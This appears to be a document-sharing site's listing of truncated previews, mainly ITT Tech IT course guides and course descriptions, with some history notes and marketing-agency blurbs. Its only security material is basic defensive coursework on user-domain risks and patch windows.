2008, February). Retrieved November 23, 2009, fromhttp://www.starbucks.com/aboutus/Company_Factsheet.pdfCompany Overview. (2009). Retrieved November 23, 2009, fromhttp://www.starbucks.com/aboutus/overview.aspSTARBUCKS AS AN INTERNATIONAL BUSINE
ITT Tech Flint - IT - 255
[]User Domain Vulnerabilities* CD dives and usb portsDisable internal drives and usb ports and enable auto antivirus scanning for any inserted mediaand email attachments* User destruction of data or systemsRestrict access to job essential systems/ap
ITT Tech Flint - IT - 255
[]Unit 2 Assignment 1: Calculate the Window of VulnerabilityThe WoV would be 11 days, one day for the day of the problem, three days for the patchavailability, and seven days for the patch to be downloaded, tested, and installed.Unit 2 Assignment 2: M
ITT Tech Flint - IT - 255
Important AdditionalInstructors ResourcesAnd Cisco Equipment Service InformationI.SMARTnetWith the procurement of the Cisco equipment for some IT courses in the CNS and DCST programs,ITT/ESI has also purchased an annual Cisco support contract, known
ITT Tech Flint - IT - 255
Sorry the Instructor Primer is not available for thiscourse.
ITT Tech Flint - IT - 255
Exam Not Applicable
ITT Tech Flint - IT - 255
Network Development Capstone ProjectInstructor GuideNetwork DevelopmentCapstone Project[Onsite]Course Revision TableFooterSection:Date:09/30/2007 All04/11/2008 Project CaseStudy09052008Project CaseStudy10302008Cover Page08/27/200911/16/2
ITT Tech Flint - IT - 255
IT331Network Development Capstone Project[Onsite]Course Description:Network design and implementation project to be jointly agreed upon by the student and thefaculty member. The project includes major process of product lifecycle such as data gatheri
ITT Tech Flint - IT - 255
Exams & Answer KeysExams & Answer KeysLinux Operating System[Onsite]Course Revision TableFooterDate01/20/2010SectionAll02/08/2010AllITT Educational Services, Inc.Reason for ChangeImplementation DateRevision to map to newMarch 2010edition
ITT Tech Flint - IT - 255
Linux Operating SystemInstructor GuideLinux Operating System[Onsite]Course Revision TableFooterDate01/20/2010SectionAll02/08/2010AllITT Educational Services, Inc.Reason for ChangeImplementation DateRevision to map to newMarch 2010edition
ITT Tech Flint - IT - 255
IT250Linux Operating System[Onsite]Course Description:Installation, configuration and management of a Linux operating system will be explored. Focuswill be on functions that resemble the UNIX environment. Directory and file management, useraccount m
ITT Tech Flint - IT - 255
Appendix A: Test and Answer KeysExams & Answer KeysAudio/Video TechniquesCourse Revision TableFooterDate1/19/09SectionAllITT Educational Services, Inc.Reason for ChangeNew CurriculumImplementation DateMarch 2009Date: 01/19/09Appendix A: Tes
ITT Tech Flint - IT - 255
Audio/Video TechniquesAudio/Video TechniquesInstructors GuideCourse Revision TableFooterDate1/19/09SectionAllITT Educational Services, Inc.Reason for ChangeNew CurriculumImplementation DateMarch 2009Date: 01/19/09Audio/Video TechniquesTabl
ITT Tech Flint - IT - 255
IT310Audio/Video Techniques[Onsite]Course Description:Techniques of integrating visual and audio features into an edited multimedia or animated pieceare introduced in this course. Students will have opportunities to output projects onto videotapeor
ITT Tech Flint - IT - 255
Exams & Answer KeysExams & Answer KeysNetwork Technology andService IntegrationCourse Revision TableFooterDate01/15/0903/13/09SectionAllUnit 103/13/09Unit 10ITT Educational Services, Inc.Reason for ChangeNew CurriculumCorrected the name o
ITT Tech Flint - IT - 255
Network Technology andService IntegrationInstructors GuideCourse Revision TableFooterDate01/15/0903/13/09SectionAllUnit 103/13/09Unit 10Reason for ChangeNew CurriculumCorrected the name of the 3rdlab in Assignment 1.2Correct the name of t
ITT Tech Flint - IT - 255
IT321Network Technology and ServiceIntegration[Onsite]Course Description:Discussions on areas where computer networking and telecommunication technologiesconverge in todays networking and internetworking industry. Concepts and case studies of howvo
ITT Tech Flint - IT - 255
ITT Technical InstituteVirtual LabsIT321 Network Technology and Service IntegrationAn Aid to Finding Virtual Lab Assignments in the CCNA NetSim ITT Edition Version 1.2Index of Units for IT321Unit 1 . 1Unit 2 . 2Unit 3 . 3Unit 4 . 4Unit 5 . 5Unit
ITT Tech Flint - IT - 255
Sorry the Instructor Primer is not available for thiscourse.
ITT Tech Flint - IT - 255
Exam Not Applicable
ITT Tech Flint - IT - 255
Multimedia Development Capstone ProjectInstructors GuideCourse Revision TableFooter Date:3/13/20036/4/0410/20/042/10/05ITT Educational Services Inc.Section:Reason for Change:Insertion of revision table noother change madeGrading Scale addedT
ITT Tech Flint - IT - 255
IT312Multimedia Development CapstoneProject[Onsite]Course Description:Students will apply knowledge and skills acquired from the previous quarters in developing acomplex multimedia project in an area of their choice with faculty.Prerequisite(s) and
ITT Tech Flint - IT - 255
Exams & Answer KeysExams & Answer KeysWAN Technology andApplicationCourse Revision TableFooterSectionReason for ChangeDate10/06/2008 Entire Courseware Change new textbookpackage and map to newCCNA criteria10/15/08Unit 8Removed the following
ITT Tech Flint - IT - 255
WAN Technology and ApplicationInstructor GuideWAN Technology andApplicationCourse Revision TableFooterSectionReason for ChangeDate10/06/2008 Entire Courseware Change new textbookpackage and map to newCCNA criteria10/15/08Unit 8Removed the fo
ITT Tech Flint - IT - 255
IT320WAN Technology and Application[Onsite]Course Description:This course discusses typical Wide Area Network (WAN) technologies along with survey onexisting services and applications. Introductory router configuration skills will be included.Prereq
ITT Tech Flint - IT - 255
Exams & Answer KeysLinux System AdministrationCourse Revision TableFooterDate03/30/2010SectionEntire DocumentITT Educational Services, Inc.Reason for ChangeUpdate textbook to 5/e andsoftware to Fedora 12Implementation DateJune 2010Date: 03/3
ITT Tech Flint - IT - 255
L inux System Administr ationInstructor GuideLinux SystemAdministration[Onsite]Course Revision TableFooterDate03/30/2010SectionEntire DocumentReason for ChangeUpdate textbook to 5/e andsoftware to Fedora 12Implementation DateJune 2010L inu
ITT Tech Flint - IT - 255
IT302Linux System Administration[Onsite]Course Description:This course covers intermediate to advanced system and network administrative tasks andrelated skills required by a Linux based network. Functional areas include the setup,configuration, mai
ITT Tech Flint - IT - 255
IT327: ERROR in Lab3a CodeCreated By: Roger Charles Brook 01/08/2007 - 22:46:58Updated By: Roger Charles Brook 01/12/2007 - 17:35:00ERROR in Lab3a CodeThe lab for unit 3 states the for an input of: (2 * (3 + 4) / 5) - (6 / (7 - 5)The answer is: -1.6
ITT Tech Flint - IT - 255
Exams & Answer KeysData StructuresCourse Revision TableFooterDate:2/27/20061/29/2007Section:Reason for Change:EffectiveAll CourseLab3aBook Change (BN,MS)Update to source code forLab3a.ImmediatelyU NIT 11 Final ExaminationRevise the topics
ITT Tech Flint - IT - 255
Data StructuresInstructors GuideCourse Revision TablePlease put your initials after your entry in the Reason for Change section.FooterDate:2/27/20061/29/2007Section:Reason for Change:EffectiveAll CourseLab3aBook Change (BN,MS)Update to sourc
ITT Tech Flint - IT - 255
IT327Data Structures[Onsite]Course Description:Through exploring fundamental data structures, data manipulation techniques and algorithmsnecessary for good program development, students will be exposed to methods of selectingappropriate data structu
ITT Tech Flint - IT - 255
Exams & Answer KeysAnimation ICourse Revision TableFooterDate4/11/082/15/10SectionAllAll03/05/10All ITT Educational Services, Inc.Reason for ChangeNew CurriculumUpdate for new softwareversionUpdated page referencesImplementation DateJun
ITT Tech Flint - IT - 255
Animation IInstructor GuideAnimation I[Onsite]Course Revision TableFooterDate4/11/082/15/10SectionAllAll03/05/10AllReason for ChangeNew CurriculumUpdate for new softwareversionUpdated page referencesImplementation DateJune 2008June 20
ITT Tech Flint - IT - 255
IT309Animation I[Onsite]Course Description:This course is a continuation of the 3D Modeling course. Principles of form topology, visualdesign and movement are applied in the creation of simple animated sequence.Prerequisite(s) and/or Corequisite(s):
ITT Tech Flint - IT - 255
This version of the course does not have a .zip folder. Please go to the vendors site to check ifsupplemental information is available: http:/www.pearsoncustom.com/ITTinstructor/
ITT Tech Flint - IT - 255
Exams & Answer KeysExams & Answer KeysSoftware Application ProgrammingCourse Revision TableFooterDate:6/4/20063/19/07Section:Reason for Change:Entire DocumentGeneral References5/19/08Entire Document2/27/09Entire DocumentNew TextbookRemove
ITT Tech Flint - IT - 255
Instructor GuideSoftware Application ProgrammingCourse Revision TablePlease put your initials after your entry in the Reason for Change section.FooterDate:6/4/20063/19/07Section:Reason for Change:Effective:Entire DocumentGeneral References5/1
ITT Tech Flint - IT - 255
IT306Software Application Programming[Onsite]Course Description:Students will apply math skills, GUI principles and programming techniques to develop complexapplication software. Teamwork, project planning and implementation are the underlying criter
Waterloo - MATH - 137
UCSD - DOC - 1
1. Loss of Momentuma. Watts Riots: Aug 1965 and 1992a.i. Assumption that African Americans loot and set fire, makes it seem likewhites are helplessa.ii. Watts Riot was set off by death of Romney King/frustration towards thenon violent strategyb. Vie
UCSD - DOC - 1
Where Do We Go from here- Martin Luther King1. Where Are We?Kings analysis of the state of American race relations and movement of a decade ofUS civil rights strugglesa. Signing of the 1965 Voting Rights Act: legislation designed to put balloteffecti
UCSD - CHEM - 6B
CHEMISTRY MIDTERM REVIEWChapters: 1-5A. Properties of MatterProperties Define the following:1. solid.2 liquid.3 gas.4 physical propertiesExamples:.5 chemical propertiesExamples:.6 physical changesExamples:.7 chemical changesIndicators of chemical c
Miami University - ISA - 116
8 Lessons Learned from AuroraAirfoils Mission Control Team is responsible for training executivesand employees of client companies to communicate their mission andmessages more successfully, especially during a crisis. The teamdevotes a significant pr
Miami University - ISA - 116
Social MediaWe love this stuff. Using social to spark conversations about you, andcreate new fans of you, is a gas. Social media monitoring. Bloggerrelations. Writing. Community moderation. We've done work forCarbonite, RatePoint, ecostore USA and sol
Bowling Green - ADV - 232
Identity Marketing GroupWe challenge our best ideas on every project resulting intop-notch creative solutions. Inspired by our ideas, we enjoyevery minute of the branding process. We are capable ofhandling any project and backed by years of experience
Bowling Green - ADV - 232
Innovationinnovation, innovation. It's always on our minds, what we'repassionate about and what our internal processes have beendesigned to lead us to. As a firm with tech and mobile in our soul,innovation is everything and the only thing. Innovation
Bowling Green - ADV - 232
InteractiveWe create content marketing and strategy, design and developcollateral, eGuides, online advertising, email marketing, websites,microsites and landing pages, search engine marketing, and, ofcourse, mobile.
Bowling Green - ADV - 232
Marketing CommunicationsA brand is built in pieces, lots and lots of very important pieces. Wemake a lot of those pieces. Like an architect creates a blueprint, wefirst create a brand strategy, which defines what we'll build. Then wemake many of the p
Bowling Green - ADV - 232
Public RelationsIts our bread and butter, what we were hatched to do. Reporters,editors, bloggers, analysts, customers, employees and otherstakeholders and influencers. Media relations. Analyst relations.Crisis communications. Digital PR. Product laun
Bowling Green - ADV - 232
Retail and eCommerceAirfoil knows retail and e-commerce. Weve helped launch productsfor the likes of Brookstone, Parrot, eBay and MICROS-Retail. Weknow whats on trend cross-channel and social integration andwhat resonates with target audiences.
Bowling Green - ADV - 232
Stock Split ExampleBefore StockSplitAfter 2 for 1Stock SplitNumber of Shares:Shares Authorized1,000,0001,000,000Shares Issued150,000300,000Treasury Shares(25,000)(50,000)Shares Outstanding125,000250,000150,000$1.00300,000$0.50$150,00
Bowling Green - MGT - 121
After All This TimeRealMeasurement Standards Are BeingSetToday, we bring you Measurement Monday and the first installment ofa three-part series from guest blogger Angela Jeffrey.I wonder how many years have passed since PR practitioners havebeen beg
Bowling Green - MGT - 121
AutomotiveWe were born in the Motor City and have a significant presence inSilicon Valley, too. So a highly technical industry like automotive is anatural for us. Weve developed the speed and flexibility required topropel fast-moving companies committ
Bowling Green - MGT - 121
Consumer TechnologyElectronics and product launches. Digital media campaigns.Whatever we can do to help a consumer tech client, we'll do. We cantake complicated technology and make it relevant to potentialcustomers.all while leveraging our strong rela
Bowling Green - MGT - 121
ELYSE DASKOWith more than 25 years of agency experience, Elyse hascreated and managed campaigns for technology, healthcareand consumer product leaders such as Motorola, Allergan,Sanofi Pasteur and New Balance as a senior manager forBurson-Marsteller
Bowling Green - MGT - 121
JASON SOLOMONSFor the past 20 years Chief Creative Officer and ManagingPartner, Jason Solomons has developed a uniqueperspective with experience on both the agency and clientside of marketing and advertising. His attraction to designbegan in his late
Bowling Green - MGT - 121
JON DRISCOLLJon Driscoll has a passion for encouraging and supportingmarketing leaders who have the courage to be changeagents in their organizations. As CEO of Identity MarketingGroup, Inc., Jon has the privilege of helping some of thecountrys leadi
Bowling Green - HST - 222
AltairTechnology that optimizes the analysis, management andvisualization of business informationBrookstoneNations leading specialty retailer and developer of unique productsthat do surprising, useful things in unexpected wayseBayWorlds largest onl
Bowling Green - HST - 222
CleantechLED lighting. Lithium-ion battery technology. e-waste recycling. Cleanautomotive innovations. Airfoil delivers cleantech public relations andmarketing communications to emerging and established companies.